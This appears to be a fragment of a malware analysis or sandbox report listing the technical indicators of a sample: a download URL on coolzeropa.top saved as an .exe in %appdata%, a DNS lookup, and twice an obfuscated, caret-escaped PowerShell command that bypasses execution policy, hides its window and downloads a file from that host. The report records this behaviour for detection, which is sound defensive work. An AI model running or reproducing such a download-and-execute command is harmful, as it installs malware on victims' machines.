Technical Information
- http://coolzeropa.top/admin.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwE^rS^hELl^.eXe -^eXEcUtiOnp^oL^ic^y bypAS^s -NoprOFi^LE -W^i^n^D^OW^S^T^Yle h^IDD^En (n^Ew-^o^bJEc^T^ ^s^ystEM.neT^.^we^bclI^En^t^).DO^wnLoadFiLe^('http://coolzeropa.top...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /C "P^OwE^rS^hELl^.eXe -^eXEcUtiOnp^oL^ic^y bypAS^s -NoprOFi^LE -W^i^n^D^OW^S^T^Yle h^IDD^En (n^Ew-^o^bJEc^T^ ^s^ystEM.neT^.^we^bclI^En^t^).DO^wnLoadFiLe^('http://coolzeropa.top...' (with hidden window)